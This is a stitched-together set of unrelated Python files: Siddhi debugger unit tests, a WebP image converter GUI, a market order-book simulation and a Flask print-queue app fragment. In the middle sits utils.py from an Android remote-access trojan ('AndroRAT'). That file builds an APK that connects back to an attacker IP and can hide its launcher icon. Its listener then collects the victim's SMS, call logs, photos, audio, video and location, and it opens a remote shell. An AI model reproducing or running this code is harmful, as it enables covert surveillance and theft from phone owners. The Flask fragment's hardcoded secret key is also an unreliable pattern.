logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 2:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
else:
# No more events should be received
_self_shaddow.fail("Invalid event count")
debugger.play()
siddhiDebugger.acquireBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl1())
inputHandler.send(["WSO2", 50.0, 60])
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl2())
inputHandler.send(["WSO2", 70.0, 40])
self.assertEquals(2, _self_shaddow.inEventCount.get(), "Invalid number of output events")
self.assertEquals(2, _self_shaddow.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_acquire_release_breakpoint(self):
logging.info("Siddi Debugger Wrapper Test 2: Acquire and Release Break Point")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " \
"define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query 1') from cseEventStream select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class StreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", StreamCallbackImpl()) # Causes GC Error
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query 1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
else:
# No more events should be received
_self_shaddow.fail("The breakpoint has not been released")
debugger.play()
siddhiDebugger.acquireBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
siddhiDebugger.releaseBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, _self_shaddow.inEventCount.get(), "Invalid number of output events")
self.assertEquals(1, _self_shaddow.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
if __name__ == '__main__':
unittest.main()
utils.py
import sys
import os
import base64
import time
import binascii
import select
import pathlib
import platform
import re
from subprocess import PIPE, run
from colorama import Fore, Style,init
from pyngrok import ngrok
import socket
import threading
import itertools
import queue
banner = """\033[1m\033[91m
_ _____ _______
/\ | | | __ \ /\|__ __|
/ \ _ __ __| |_ __ ___ | |__) | / \ | |
/ /\ \ | '_ \ / _` | '__/ _ \| _ / / /\ \ | |
/ ____ \| | | | (_| | | | (_) | | \ \ / ____ \| |
/_/ \_\_| |_|\__,_|_| \___/|_| \_\/_/ \_\_|
\033[93m-Forked By Vicky
"""
pattern = '\"(\\d+\\.\\d+).*\"'
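# Regex used later in build() to pull the major.minor Java version (e.g. 1.8) out of the quoted version string printed by `java -version`.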
def stdOutput(type_=None):
if type_=="error":col="31m";str="ERROR"
if type_=="warning":col="33m";str="WARNING"
if type_=="success":col="32m";str="SUCCESS"
if type_ == "info":return "\033[1m[\033[33m\033[0m\033[1m\033[33mINFO\033[0m\033[1m] "
message = "\033[1m[\033[31m\033[0m\033[1m\033["+col+str+"\033[0m\033[1m]\033[0m "
return message
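# animate() renders a single spinner frame per call; callers invoke it in a loop while a worker thread does the real work.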
def animate(message):
chars = "/—\\|"
for char in chars:
sys.stdout.write("\r"+stdOutput("info")+"\033[1m"+message+"\033[31m"+char+"\033[0m")
time.sleep(.1)
sys.stdout.flush()
def clearDirec():
if(platform.system() == 'Windows'):
clear = lambda: os.system('cls')
direc = "\\"
init(convert=True)
else:
clear = lambda: os.system('clear')
direc = "/"
return clear,direc
clear,direc = clearDirec()
if not os.path.isdir(os.getcwd()+direc+"Dumps"):
os.makedirs("Dumps")
def is_valid_ip(ip):
m = re.match(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$", ip)
return bool(m) and all(map(lambda n: 0 <= int(n) <= 255, m.groups()))
def is_valid_port(port):
# Accept only numeric ports inside the valid TCP range 1-65535
return port.isdigit() and 0 < int(port) <= 65535
def execute(command):
return run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
def executeCMD(command,queue):
result = run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
queue.put(result)
return result
def getpwd(name):
return os.getcwd()+direc+name;
def help():
helper="""
Usage:
deviceInfo --> returns basic info of the device
camList --> returns the camera IDs
takepic [cameraID] --> takes a picture from the given camera
startVideo [cameraID] --> starts recording video
stopVideo --> stops recording video and returns the video file
startAudio --> starts recording audio
stopAudio --> stops recording audio
getSMS [inbox|sent] --> returns inbox or sent SMS in a file
getCallLogs --> returns call logs in a file
shell --> starts an interactive shell on the device
vibrate [number_of_times] --> vibrates the device the given number of times
getLocation --> returns the current location of the device
getIP --> returns the IP of the device
getSimDetails --> returns the details of all SIMs on the device
clear --> clears the screen
getClipData --> returns the text currently saved in the clipboard
getMACAddress --> returns the MAC address of the device
exit --> exits the interpreter
"""
print(helper)
def getImage(client):
print(stdOutput("info")+"\033[0mTaking Image")
timestr = time.strftime("%Y%m%d-%H%M%S")
flag=0
filename ="Dumps"+direc+"Image_"+timestr+'.jpg'
imageBuffer=recvall(client)
imageBuffer = imageBuffer.strip().replace("END123","").strip()
if imageBuffer=="":
print(stdOutput("error")+"Unable to connect to the Camera\n")
return
with open(filename,'wb') as img:
try:
imgdata = base64.b64decode(imageBuffer)
img.write(imgdata)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\n")
except binascii.Error as e:
flag=1
print(stdOutput("error")+"Not able to decode the Image\n")
if flag == 1:
os.remove(filename)
def readSMS(client,data):
print(stdOutput("info")+"\033[0mGetting "+data+" SMS")
msg = "start"
timestr = time.strftime("%Y%m%d-%H%M%S")
filename = "Dumps"+direc+data+"_"+timestr+'.txt'
flag =0
with open(filename, 'w',errors="ignore", encoding="utf-8") as txt:
msg = recvall(client)
try:
txt.write(msg)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\n")
except UnicodeDecodeError:
flag = 1
print(stdOutput("error")+"Unable to decode the SMS\n")
if flag == 1:
os.remove(filename)
def getFile(filename,ext,data):
fileData = "Dumps"+direc+filename+"."+ext
flag=0
with open(fileData, 'wb') as file:
try:
rawFile = base64.b64decode(data)
file.write(rawFile)
print(stdOutput("success")+"Succesfully Downloaded in \033[1m\033[32m"+getpwd(fileData)+"\n")
except binascii.Error:
flag=1
print(stdOutput("error")+"Not able to decode the Audio File")
if flag == 1:
os.remove(filename)
def putFile(filename):
data = open(filename, "rb").read()
encoded = base64.b64encode(data)
return encoded
def shell(client):
msg = "start"
command = "ad"
while True:
msg = recvallShell(client)
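# The device marks file transfers with getFile/putFile keywords; getFile payloads carry the name, extension and base64 data separated by |_|.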
if "getFile" in msg:
msg=" "
msg1 = recvall(client)
msg1 = msg1.replace("\nEND123\n","")
filedata = msg1.split("|_|")
getFile(filedata[0],filedata[1],filedata[2])
if "putFile" in msg:
msg=" "
sendingData=""
filename = command.split(" ")[1].strip()
file = pathlib.Path(filename)
if file.exists():
encoded_data = putFile(filename).decode("UTF-8")
filedata = filename.split(".")
sendingData+="putFile"+"<"+filedata[0]+"<"+filedata[1]+"<"+encoded_data+"END123\n"
client.send(sendingData.encode("UTF-8"))
print(stdOutput("success")+f"Succesfully Uploaded the file \033[32m{filedata[0]+'.'+filedata[1]} in /sdcard/temp/")
else:
print(stdOutput("error")+"File not exist")
if "Exiting" in msg:
print("\033[1m\033[33m----------Exiting Shell----------\n")
return
msg = msg.split("\n")
for i in msg[:-2]:
print(i)
print(" ")
command = input("\033[1m\033[36mandroid@shell:~$\033[0m \033[1m")
command = command+"\n"
if command.strip() == "clear":
client.send("test\n".encode("UTF-8"))
clear()
else:
client.send(command.encode("UTF-8"))
def getLocation(sock):
msg = "start"
while True:
msg = recvall(sock)
msg = msg.split("\n")
for i in msg[:-2]:
print(i)
if("END123" in msg):
return
print(" ")
def recvall(sock):
buff=""
data = ""
while "END123" not in data:
data = sock.recv(4096).decode("UTF-8","ignore")
buff+=data
return buff
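# Shell variant of recvall: waits up to 3 seconds for the socket to become readable and returns the placeholder string "bogus" if nothing arrives.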
def recvallShell(sock):
buff=""
data = ""
ready = select.select([sock], [], [], 3)
while "END123" not in data:
if ready[0]:
data = sock.recv(4096).decode("UTF-8","ignore")
buff+=data
else:
buff="bogus"
return buff
return buff
def stopAudio(client):
print(stdOutput("info")+"\033[0mDownloading Audio")
timestr = time.strftime("%Y%m%d-%H%M%S")
data= ""
flag =0
data=recvall(client)
data = data.strip().replace("END123","").strip()
filename = "Dumps"+direc+"Audio_"+timestr+".mp4"
with open(filename, 'wb') as audio:
try:
audioData = base64.b64decode(data)
audio.write(audioData)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename))
except binascii.Error:
flag=1
print(stdOutput("error")+"Not able to decode the Audio File")
print(" ")
if flag == 1:
os.remove(filename)
def stopVideo(client):
print(stdOutput("info")+"\033[0mDownloading Video")
timestr = time.strftime("%Y%m%d-%H%M%S")
data= ""
flag=0
data=recvall(client)
data = data.strip().replace("END123","").strip()
filename = "Dumps"+direc+"Video_"+timestr+'.mp4'
with open(filename, 'wb') as video:
try:
videoData = base64.b64decode(data)
video.write(videoData)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename))
except binascii.Error:
flag = 1
print(stdOutput("error")+"Not able to decode the Video File\n")
if flag == 1:
os.remove("Video_"+timestr+'.mp4')
def callLogs(client):
print(stdOutput("info")+"\033[0mGetting Call Logs")
msg = "start"
timestr = time.strftime("%Y%m%d-%H%M%S")
msg = recvall(client)
filename = "Dumps"+direc+"Call_Logs_"+timestr+'.txt'
if "No call logs" in msg:
msg.split("\n")
print(msg.replace("END123","").strip())
print(" ")
else:
with open(filename, 'w',errors="ignore", encoding="utf-8") as txt:
txt.write(msg)
print(stdOutput("success")+"Successfully Saved in \033[1m\033[32m"+getpwd(filename)+"\033[0m")
if not os.path.getsize(filename):
os.remove(filename)
def get_shell(ip,port):
soc = socket.socket(type=socket.SOCK_STREAM)
try:
soc.bind((ip, int(port)))
except Exception as e:
print(stdOutput("error")+"\033[1m %s"%e);exit()
soc.listen(2)
print(banner)
while True:
que = queue.Queue()
t = threading.Thread(target=connection_checker,args=[soc,que])
t.daemon = True
t.start()
while t.isAlive(): animate("Waiting for Connections ")
t.join()
conn, addr = que.get()
clear()
print("\033[1m\033[33mGot connection from \033[31m"+"".join(str(addr))+"\033[0m")
print(" ")
while True:
msg = conn.recv(4024).decode("UTF-8")
if(msg.strip() == "IMAGE"):
getImage(conn)
elif("readSMS" in msg.strip()):
content = msg.strip().split(" ")
data = content[1]
readSMS(conn,data)
elif(msg.strip() == "SHELL"):
shell(conn)
elif(msg.strip() == "getLocation"):
getLocation(conn)
elif(msg.strip() == "stopVideo123"):
stopVideo(conn)
elif(msg.strip() == "stopAudio"):
stopAudio(conn)
elif(msg.strip() == "callLogs"):
callLogs(conn)
elif(msg.strip() == "help"):
help()
else:
print(stdOutput("error")+msg) if "Unknown Command" in msg else print("\033[1m"+msg) if "Hello there" in msg else print(msg)
message_to_send = input("\033[1m\033[36mInterpreter:/> \033[0m")+"\n"
conn.send(message_to_send.encode("UTF-8"))
if message_to_send.strip() == "exit":
print(" ")
print("\033[1m\033[32m\t (∗ ・‿・)ノ゛\033[0m")
sys.exit()
if(message_to_send.strip() == "clear"):clear()
def connection_checker(socket,queue):
conn, addr = socket.accept()
queue.put([conn,addr])
return conn,addr
def build(ip,port,output,ngrok=False,ng=None,icon=None):
editor = "Compiled_apk"+direc+"smali"+direc+"com"+direc+"example"+direc+"reverseshell2"+direc+"config.smali"
try:
file = open(editor,"r").readlines()
# Very brittle (hard-coded line numbers in config.smali), but can't think of any other way to do it
file[18]=file[18][:21]+"\""+ip+"\""+"\n"
file[23]=file[23][:21]+"\""+port+"\""+"\n"
file[28]=file[28][:15]+" 0x0"+"\n" if icon else file[28][:15]+" 0x1"+"\n"
str_file="".join([str(elem) for elem in file])
open(editor,"w").write(str_file)
except Exception as e:
print(e)
sys.exit()
java_version = execute("java -version")
if java_version.stderr == "":print(stdOutput("error")+"Java Not Installed");exit()
version_no = re.search(pattern, java_version.stderr).groups()[0]
if float(version_no) < 1.8: print(stdOutput("error")+"Java 8 is required ");exit()
print(stdOutput("info")+"\033[0mGenerating APK")
outFileName = output if output else "karma.apk"
que = queue.Queue()
t = threading.Thread(target=executeCMD,args=["java -jar Jar_utils/apktool.jar b Compiled_apk -o "+outFileName,que],)
t.start()
while t.isAlive(): animate("Building APK ")
t.join()
print(" ")
resOut = que.get()
if not resOut.returncode:
print(stdOutput("success")+"Successfully apk built in \033[1m\033[32m"+getpwd(outFileName)+"\033[0m")
print(stdOutput("info")+"\033[0mSigning the apk")
t = threading.Thread(target=executeCMD,args=["java -jar Jar_utils/sign.jar "+outFileName+" --override",que],)
t.start()
while t.isAlive(): animate("Signing Apk ")
t.join()
print(" ")
resOut = que.get()
if not resOut.returncode:
print(stdOutput("success")+"Successfully signed the apk \033[1m\033[32m"+outFileName+"\033[0m")
if ngrok:
clear()
get_shell("0.0.0.0",8000) if not ng else get_shell("0.0.0.0",ng)
print(" ")
else:
print("\r"+resOut.stderr)
print(stdOutput("error")+"Signing Failed")
else:
print("\r"+resOut.stderr)
print(stdOutput("error")+"Building Failed")
|
main.py
|
# WEB P CONVERTER BY BIG SECRET. PLEASE DO NOT REDISTRIBUTE OR SELL.
# This software may not be resold, redistributed or otherwise conveyed to a third party
import traceback
import threading
import os
import sys
from PIL import Image, UnidentifiedImageError
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
class convertToWebP(QMainWindow):
def __init__(self, *args, **kwargs):
super(convertToWebP, self).__init__(*args, **kwargs)
self.version = 1.3
self.inputPath = ""
self.usingFolder = False
self.fileCount = 0
self.imagesConvertedCount = 0
self.losslessStatus = False
self.exportQuality = 80
self.exportMethod = 4
self.saveToInputDirectory = False
self.outputPath = ""
self.filesToConvert = []
self.fileCount = 0
self.inputDirectory = ""
self.outputFolderSet = False
# UI
self.setWindowTitle(f"WebP Converter by Big Secret | v{self.version}")
self.setWindowIcon(QIcon('appIcon-01.ico'))
self.setMinimumSize(500, 350)
self.setFont(QFont("Arial", 10))
# LAYOUTS
self.mainLayout = QVBoxLayout()
self.headerLayout = QHBoxLayout()
self.topBarLayout = QHBoxLayout()
self.settingsFrame = QFrame()
self.settingsLayout = QVBoxLayout()
self.settingsLayout.setAlignment(Qt.AlignHCenter)
self.settingsFrame.setFrameShape(QFrame.StyledPanel)
self.settingsFrame.setLineWidth(5)
self.settingsFrame.setLayout(self.settingsLayout)
self.statusBarLayout = QHBoxLayout()
# WIDGETS
# TOP BAR
self.locateFilesLabel = QLabel()
self.locateFilesLabel.setText("Locate File(s):")
self.buyMeCoffee = QLabel()
self.buyMeCoffee.setText("<a href='https://www.paypal.com/donate/?hosted_button_id=KMU4WDWUUVK4C'>Buy me a coffee</a>")
self.buyMeCoffee.setFont(QFont("Arial", 8))
self.buyMeCoffee.setTextFormat(Qt.RichText)
self.buyMeCoffee.setTextInteractionFlags(Qt.TextBrowserInteraction)
self.buyMeCoffee.setOpenExternalLinks(True)
self.headerLayout.addWidget(self.locateFilesLabel)
self.headerLayout.addStretch()
self.headerLayout.addWidget(self.buyMeCoffee)
self.selectFileButton = QPushButton()
self.selectFileButton.setText("Select File(s)")
self.selectFileButton.clicked.connect(self.selectFile)
self.selectFolderButton = QPushButton()
self.selectFolderButton.setText("Select Folder")
self.selectFolderButton.clicked.connect(self.selectFolder)
self.resetAllButton = QPushButton()
self.resetAllButton.setText("Reset All")
self.resetAllButton.clicked.connect(self.initializeSettings)
# PLACE INTO LAYOUT
self.topBarLayout.addWidget(self.selectFileButton)
self.topBarLayout.addWidget(self.selectFolderButton)
self.topBarLayout.addStretch()
self.topBarLayout.addWidget(self.resetAllButton)
# SETTINGS BAR
self.settingsLabel = QLabel()
self.settingsLabel.setText("Convert to WebP Settings")
self.settingsLabel.setFont(QFont("Arial", 13))
self.losslessCheckbox = QCheckBox()
self.losslessCheckbox.setText("Lossless Format")
self.losslessCheckbox.stateChanged.connect(self.updateLosslessCheckbox)
# QUALITY
self.qualityDefault = 80
self.qualityNameLabel = QLabel()
self.qualityNameLabel.setText("Quality: ")
self.qualityNumberLabel = QLineEdit()
self.qualityNumberLabel.setFixedWidth(25)
self.qualityNumberLabel.setText(f"{self.qualityDefault}")
self.qualityNumberLabel.textChanged.connect(self.updateQualityEntry)
self.qualitySlider = QSlider()
self.qualitySlider.setValue(self.qualityDefault)
self.qualitySlider.setOrientation(Qt.Horizontal)
self.qualitySlider.setMaximum(100)
self.qualitySlider.setMinimum(1)
self.qualitySlider.setSizeIncrement(1, 0)
self.qualitySlider.valueChanged.connect(self.updateQualitySlider)
self.qualityDescriptionLabel = QLabel()
self.qualityDescriptionLabel.setText(
"1-100, Defaults to 80.\nFor lossy, 0 gives the smallest size and 100 the largest. For lossless, this parameter is the amount of effort put into the compression: 0 is the fastest, but gives larger files compared to the slowest, but best, 100.")
self.qualityDescriptionLabel.setFont(QFont("Arial", 8))
self.qualityDescriptionLabel.setWordWrap(True)
# Create H Layout for these Quality Widgets
self.qualityLayout = QHBoxLayout()
self.qualityLayout.addWidget(self.qualityNameLabel)
self.qualityLayout.addWidget(self.qualityNumberLabel)
self.qualityLayout.addWidget(self.qualitySlider)
# METHOD
self.methodDefault = 4
self.methodLabel = QLabel()
self.methodLabel.setText("Method: ")
self.methodNumberLabel = QLineEdit()
self.methodNumberLabel.setText(str(self.methodDefault))
self.methodNumberLabel.setFixedWidth(25)
self.methodNumberLabel.textChanged.connect(self.updateMethodEntry)
self.methodSlider = QSlider()
self.methodSlider.setOrientation(Qt.Horizontal)
self.methodSlider.setMinimum(0)
self.methodSlider.setMaximum(6)
self.methodSlider.setValue(self.methodDefault)
self.methodSlider.valueChanged.connect(self.updateMethodSlider)
self.methodDescriptionLabel = QLabel()
self.methodDescriptionLabel.setText("Quality vs Speed Tradeoff. Defaults to 4.\n0 = Fast, 6 = Slower, Better.")
self.methodDescriptionLabel.setFont(QFont("Arial", 8))
self.methodDescriptionLabel.setWordWrap(True)
self.saveCurrentSettingsCheckbox = QCheckBox()
self.saveCurrentSettingsCheckbox.setText("Save Settings (coming soon)")
self.saveCurrentSettingsCheckbox.setDisabled(True)
# CREATE H LAYOUT FOR METHOD WIDGETS
self.methodLayout = QHBoxLayout()
self.methodLayout.addWidget(self.methodLabel)
self.methodLayout.addWidget(self.methodNumberLabel)
self.methodLayout.addWidget(self.methodSlider)
# OUTPUT
self.sameAsInputCheckbox = QCheckBox()
self.sameAsInputCheckbox.setText("Save to Input Directory")
self.sameAsInputCheckbox.setChecked(True)
self.sameAsInputCheckbox.setDisabled(True)
self.sameAsInputCheckbox.stateChanged.connect(self.updateOutputCheckbox)
self.setOutFolderButton = QPushButton()
self.setOutFolderButton.setText("Select Output Folder")
self.setOutFolderButton.setFixedWidth(140)
self.setOutFolderButton.setDisabled(True)
self.setOutFolderButton.clicked.connect(self.selectOutputFolder)
# PLACE INTO LAYOUT
self.settingsLayout.addWidget(self.settingsLabel)
self.settingsLayout.addWidget(self.losslessCheckbox)
self.settingsLayout.addLayout(self.qualityLayout)
self.settingsLayout.addWidget(self.qualityDescriptionLabel)
self.settingsLayout.addLayout(self.methodLayout)
self.settingsLayout.addWidget(self.methodDescriptionLabel)
self.settingsLayout.addWidget(self.saveCurrentSettingsCheckbox)
self.settingsLayout.addStretch()
# STATUS BAR
self.statusBarText = QLabel()
self.statusBarText.setText("State: Ready")
self.statusBarText.setWordWrap(True)
self.statusBarText.setFont(QFont('Arial',8))
self.statusBarText.setFixedWidth(round(self.width()*.75))
self.convertImagesButton = QPushButton()
self.convertImagesButton.setText("Convert to WebP ▶")
self.convertImagesButton.setDisabled(True)
self.convertImagesButton.clicked.connect(self.createConvertThread)
# PLACE INTO LAYOUT
self.statusBarLayout.addWidget(self.statusBarText)
self.statusBarLayout.addStretch()
self.statusBarLayout.addWidget(self.convertImagesButton)
# ORDER LAYOUTS
self.mainLayout.addLayout(self.headerLayout)
self.mainLayout.addLayout(self.topBarLayout)
self.mainLayout.addWidget(self.settingsFrame)
self.mainLayout.addWidget(self.sameAsInputCheckbox)
self.mainLayout.addWidget(self.setOutFolderButton)
self.mainLayout.addLayout(self.statusBarLayout)
# FINALIZE UI
self.mainWidget = QWidget()
self.mainWidget.setLayout(self.mainLayout)
self.setCentralWidget(self.mainWidget)
self.show()
self.setFixedSize(self.width(), self.height())
# INITIALIZE SETTINGS
def initializeSettings(self):
self.inputPath = ""
self.usingFolder = False
self.fileCount = 0
self.imagesConvertedCount = 0
self.losslessStatus = False
self.exportQuality = 80
self.exportMethod = 4
self.saveToInputDirectory = False
self.outputPath = ""
self.filesToConvert = []
self.fileCount = 0
self.inputDirectory = ""
self.outputFolderSet = False
self.qualityNumberLabel.setText(str(self.qualityDefault))
self.methodNumberLabel.setText(str(self.methodDefault))
self.losslessCheckbox.setCheckState(0)
self.saveCurrentSettingsCheckbox.setCheckState(0)
self.sameAsInputCheckbox.setCheckState(0)
self.convertImagesButton.setDisabled(True)
self.setOutFolderButton.setDisabled(True)
self.sameAsInputCheckbox.setDisabled(True)
self.setStatusText("Everything Reset!")
def setStatusText(self, text):
self.statusBarText.setText(f"Status: {text}")
print(f"Status: {text}")
# VALUE SLIDER SETTINGS FOR QUALITY
def updateQualitySlider(self, value):
self.qualityNumberLabel.setText(str(value))
self.exportQuality = int(value)
def updateQualityEntry(self, value):
if value == "":
return
elif len(value) > 0:
if int(value) > 100:
value = 100
elif int(value) == 0:
value = self.qualityDefault
else:
value = int(value)
self.qualityNumberLabel.setText(str(value))
self.qualitySlider.setValue(value)
self.exportQuality = int(value)
else:
self.qualitySlider.setValue(self.qualityDefault)
# VALUE SLIDER SETTINGS FOR METHOD
def updateMethodEntry(self, value):
if value == "":
return
elif int(value) > 6:
self.methodNumberLabel.setText(str(6))
value = 6
else:
value = int(value)
self.methodSlider.setValue(value)
self.exportMethod = int(value)
def updateMethodSlider(self, value):
self.methodNumberLabel.setText(str(value))
self.exportMethod = int(value)
# EXPORT CHECKBOX SETTINGS
def updateLosslessCheckbox(self,value):
if value == 2:
self.losslessStatus = True
elif value == 0:
self.losslessStatus = False
def updateOutputCheckbox(self, value):
if value > 0:
self.setOutFolderButton.setDisabled(True)
self.saveToInputDirectory = True
elif value == 0:
self.setOutFolderButton.setDisabled(False)
self.saveToInputDirectory = False
def selectFile(self):
self.inputPath, check = QFileDialog.getOpenFileNames(None, "Select an Image File", "C:\\", "All Files (*)")
if len(self.inputPath) > 0:
inputDirectory = self.inputPath[0].split("/")
inputDirectory.pop(-1)
for i in inputDirectory:
if self.inputDirectory == "":
self.inputDirectory = i
else:
self.inputDirectory = f"{self.inputDirectory}/{i}"
if check:
for x in self.inputPath:
self.fileCount += 1
self.filesToConvert.append(x)
self.setStatusText(f"Added {x}")
self.setStatusText(f"{self.fileCount} files loaded from {self.inputDirectory}.")
self.inputPath = self.inputDirectory
self.outputPath = self.inputPath
self.convertImagesButton.setDisabled(False)
self.setOutFolderButton.setDisabled(False)
self.sameAsInputCheckbox.setDisabled(False)
def selectFolder(self):
self.inputPath = QFileDialog.getExistingDirectory(None, "Select a Folder", "C:\\")
self.outputPath = self.inputPath
if self.inputPath:
for file in os.listdir(self.inputPath):
if "." in file:
self.filesToConvert.append(f"{self.inputPath}/{file}")
self.fileCount = len(self.filesToConvert)
self.setStatusText(f"{self.fileCount} files loaded from {self.inputPath}.")
self.convertImagesButton.setDisabled(False)
self.setOutFolderButton.setDisabled(False)
self.sameAsInputCheckbox.setDisabled(False)
def selectOutputFolder(self):
self.outputPath = QFileDialog.getExistingDirectory(None, "Select a Folder", self.inputPath)
if len(self.outputPath) > 0:
if self.inputDirectory == self.outputPath:
self.sameAsInputCheckbox.setChecked(True)
self.setStatusText(f"{self.outputPath} same as input directory.")
else:
self.setStatusText(f"{self.outputPath} set as output directory.")
self.sameAsInputCheckbox.setChecked(False)
self.outputFolderSet = True
def convertWebP(self):
self.setDisabled(True)
self.statusBarText.setDisabled(False)
self.buyMeCoffee.setDisabled(False)
for file in self.filesToConvert:
self.convertThisImage(file)
self.initializeSettings()
self.setStatusText("Conversion Complete")
self.setDisabled(False)
def createConvertThread(self):
print(f"STARTING CONVERSION PROCESS WITH THE FOLLOWING SETTINGS:\n"
f"Lossless: {self.losslessStatus}\n"
f"Export Quality: {self.exportQuality}\n"
f"Export Method: {self.exportMethod}\n")
self.convertImagesButton.setDisabled(True)
self.x = threading.Thread(target=self.convertWebP)
self.x.start()
def convertThisImage(self, imagePath):
self.setStatusText(f"Converting {imagePath}")
try:
image = Image.open(imagePath)
image = image.convert("RGBA")
if self.saveToInputDirectory:
outputDirectory = self.inputPath
else:
outputDirectory = self.outputPath
filename = imagePath.split("/")[-1]
filename = filename.split(".")[0] + ".webp"
finalPath = f"{outputDirectory}/{filename}"
imgInfo = image.info
image.save(finalPath, format='webp', lossless=self.losslessStatus, quality=self.exportQuality,
method=self.exportMethod, **imgInfo)
self.imagesConvertedCount += 1
self.setStatusText(f"{self.imagesConvertedCount}/{self.fileCount} converted & saved as {finalPath}")
except UnidentifiedImageError:
self.setStatusText(f"!!!!! ERROR: {imagePath} not supported !!!!!")
if __name__ == "__main__":
app = QApplication(sys.argv)
window = convertToWebP()
window.show()
# monitorQueue()
app.exec_()
traceback.print_exc()
|
simulation.py
|
import threading
import numpy as np
from src.side import (
Side
)
from src.event_generator import (
EventTypes,
EventGenerator,
event_generation_loop
)
def run_market_data_simulation(config, state):
# Create threads that create the market events
threads = []
# Create buy limit order add sampling threads
n_levels = 15
thread_id = 1
instrument = "0"
for level in range(1, n_levels + 1):
generator = EventGenerator(thread_id, instrument, EventTypes.ADD, Side.B, level, 1.10 * np.exp(-0.08*(level - 1)), 1)
kwargs = {'state': state, 'generator': generator}
state.add_simulation_thread(threading.Thread(target=event_generation_loop, kwargs=kwargs))
thread_id += 1
# Create sell limit order add sampling threads
for level in range(1, n_levels + 1):
generator = EventGenerator(thread_id, instrument, EventTypes.ADD, Side.S, level, 1.10 * np.exp(-0.08*(level - 1)), 1)
kwargs = {'state': state, 'generator': generator}
state.add_simulation_thread(threading.Thread(target=event_generation_loop, kwargs=kwargs))
thread_id += 1
# Create buy limit order cancel sampling threads
for level in range(1, n_levels + 1):
generator = EventGenerator(thread_id, instrument, EventTypes.CANCEL, Side.B, level, 1.0 * np.exp(-0.10*(level - 1)), 1)
kwargs = {'state': state, 'generator': generator}
state.add_simulation_thread(threading.Thread(target=event_generation_loop, kwargs=kwargs))
thread_id += 1
# Create sell limit order cancel sampling threads
for level in range(1, n_levels + 1):
generator = EventGenerator(thread_id, instrument, EventTypes.CANCEL, Side.S, level, 1.0 * np.exp(-0.10*(level - 1)), 1)
kwargs = {'state': state, 'generator': generator}
state.add_simulation_thread(threading.Thread(target=event_generation_loop, kwargs=kwargs))
thread_id += 1
# Create a buy market order sampling thread
generator = EventGenerator(thread_id, instrument, EventTypes.MARKET_ORDER, Side.B, None, 0.5, None)
kwargs = {'state': state, 'generator': generator}
state.add_simulation_thread(threading.Thread(target=event_generation_loop, kwargs=kwargs))
thread_id += 1
# Create a sell market order sampling thread
generator = EventGenerator(thread_id, instrument, EventTypes.MARKET_ORDER, Side.S, None, 0.5, None)
kwargs = {'state': state, 'generator': generator}
state.add_simulation_thread(threading.Thread(target=event_generation_loop, kwargs=kwargs))
thread_id += 1
# Start the threads
for thread in state.get_simulation_threads():
thread.start()
|
app.py
|
# Imports for client
import os
from flask import Flask, render_template, redirect, url_for, request, flash
from flask_bootstrap import Bootstrap
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, PasswordField, BooleanField, SelectField
from wtforms.validators import InputRequired, Email, Length
from flask_sqlalchemy import SQLAlchemy
from werkzeug.security import generate_password_hash, check_password_hash
from werkzeug.utils import secure_filename
from flask_login import LoginManager, UserMixin, login_user, login_required, logout_user, current_user
from flask_admin import Admin, BaseView, expose
from flask_admin.contrib.sqla import ModelView
from emailValidator import checkUobEmail
from orchestrators import Orchestrator
from printers import Printer
from jobs import Job
from queue import Queue
waiting_q = Queue(maxsize=0)
printing_q = Queue(maxsize=0)
import threading
app = Flask(__name__)
# App config for login and DB
app.config['SECRET_KEY'] = 'helloworld'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///./database.db'
# Config for upload
UPLOAD_FOLDER = './static/uploads'
ALLOWED_EXTENSIONS = set(['g', 'gcode'])
